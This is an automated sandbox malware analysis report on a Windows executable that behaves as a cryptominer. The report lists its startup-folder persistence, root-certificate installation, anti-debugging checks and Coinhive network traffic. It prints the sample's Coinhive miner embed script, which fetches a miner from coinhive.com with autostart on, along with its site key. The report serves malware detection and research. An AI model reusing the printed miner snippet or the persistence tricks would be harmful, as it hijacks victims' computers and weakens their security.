Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:472036
Start time:13:31:50
Joe Sandbox Product:Cloud
Start date:03.01.2018
Overall analysis duration:0h 7m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Fc4oWdmbpJ (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection:MAL
Classification:mal56.adwa.mine.winEXE@6/28@11/6
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, WmiApSrv.exe, mscorsvw.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: Fc4oWdmbpJ.exe, windata0.exe


Detection

StrategyScoreRangeReportingDetection
Threshold560 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Configures the Internet Explorer emulation mode (likely to run Javascript)Show sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeRegistry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Fc4oWdmbpJ.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeRegistry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION windata0.exe
Found strings related to Crypto-MiningShow sources
Source: Fc4oWdmbpJ.exeString found in binary or memory: <script src="https://coinhive.com/lib/miner.min.js" async></script><div class="coinhive-miner" style="width: 256px; height: 310px"data-key="9WWU5nzJXu1rB3gO3Or4atRpOQlqsodr"data-autostart="true"data-whitelabel="false"data-background="#000000"data-text="#eeeeee"data-action="#00ff00"data-graph="#555555"data-threads="1"data-throttle="0"data-start="Start Now!"><em>Please disable Adblock!</em></div>

Networking:

barindex
Downloads filesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0SCE2KB1\miner.min[1].js
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: coinhive.com
Urls found in memory or binary dataShow sources
Source: 1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19.2.dr, 1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19.7.drString found in binary or memory: http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6
Source: 5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.2.dr, 5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.7.drString found in binary or memory: http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8h
Source: 5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.2.dr, 5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.7.drString found in binary or memory: http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xC
Source: miner.min[1].js.2.dr, miner.min[1].js.7.drString found in binary or memory: https://authedmine.com/authenticate.html
Source: miner.min[1].js.2.dr, miner.min[1].js.7.drString found in binary or memory: https://coinhive.com/captcha/
Source: miner.min[1].js.2.dr, miner.min[1].js.7.drString found in binary or memory: https://coinhive.com/lib/
Source: windata0.exe.2.drString found in binary or memory: https://coinhive.com/lib/miner.min.js
Source: miner.min[1].js.2.dr, miner.min[1].js.7.drString found in binary or memory: https://coinhive.com/media/miner.html
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeWindow created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Drops certificate files (DER)Show sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA85AA5B_40844D66CCA168B7287809F3A3E01D19
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4

System Summary:

barindex
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
PE file contains a COM descriptor data directoryShow sources
Source: Fc4oWdmbpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Fc4oWdmbpJ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: Fc4oWdmbpJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Users\Cyb3rNuX\Documents\Visual Studio 2010\Projects\d4eade42751d70b2eee7875ce3635c7b\d4eade42751d70b2eee7875ce3635c7b\obj\x86\Debug\d4eade42751d70b2eee7875ce3635c7b.pdb source: Fc4oWdmbpJ.exe, windata0.exe.2.dr
Classification labelShow sources
Source: classification engineClassification label: mal56.adwa.mine.winEXE@6/28@11/6
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
PE file has an executable .text section and no other executable sectionShow sources
Source: Fc4oWdmbpJ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Fc4oWdmbpJ.exe 'C:\Users\user\Desktop\Fc4oWdmbpJ.exe'
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe unknown
Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
PE file contains strange resourcesShow sources
Source: Fc4oWdmbpJ.exeStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: windata0.exe.2.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: Fc4oWdmbpJ.exeBinary or memory string: OriginalFilenamed4eade42751d70b2eee7875ce3635c7b.exed! vs Fc4oWdmbpJ.exe
Source: Fc4oWdmbpJ.exeBinary or memory string: OriginalFilenamed4eade42751d70b2eee7875ce3635c7b.exed! vs Fc4oWdmbpJ.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile read: C:\Users\user\Desktop\Fc4oWdmbpJ.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Stores files to the Windows start menu directoryShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe\:Zone.Identifier:$DATA
Drops PE files to the startup folderShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess information queried: ProcessInformation
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\explorer.exe TID: 3852Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3876Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe TID: 3960Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe TID: 3960Thread sleep time: -60000s >= -60000s

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeMemory allocated: page read and write and page guard
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_windows_start_menu_programs_startup_8dae6c61b8a77b32.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeProcess token adjusted: Debug

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Users\user\Desktop\Fc4oWdmbpJ.exe VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Modifies the internet feature controls of the internet explorerShow sources
Source: C:\Users\user\Desktop\Fc4oWdmbpJ.exeRegistry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exeRegistry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 472036 Sample: Fc4oWdmbpJ Startdate: 03/01/2018 Architecture: WINDOWS Score: 56 37 Found strings related to Crypto-Mining 2->37 6 Fc4oWdmbpJ.exe 9 25 2->6         started        11 explorer.exe 2->11         started        13 explorer.exe 1 2->13         started        15 cmd.exe 2->15         started        process3 dnsIp4 31 coinhive.com 6->31 33 ws009.coinhive.com 136.243.89.209, 443, 49174, 49183 HETZNER-ASDE Germany 6->33 35 5 other IPs or domains 6->35 21 C:\Users\...\windata0.exe:Zone.Identifier, ASCII 6->21 dropped 23 C:\Users\user\AppData\...\windata0.exe, PE32 6->23 dropped 41 Installs new ROOT certificates 6->41 43 Drops PE files to the startup folder 6->43 45 Configures the Internet Explorer emulation mode (likely to run Javascript) 6->45 17 windata0.exe 1 14 11->17         started        file5 signatures6 process7 dnsIp8 25 coinhive.com 17->25 27 ws010.coinhive.com 94.130.129.247, 443, 49180 HETZNER-ASDE Germany 17->27 29 2 other IPs or domains 17->29 39 Configures the Internet Explorer emulation mode (likely to run Javascript) 17->39 signatures9

Simulations

Behavior and APIs

TimeTypeDescription
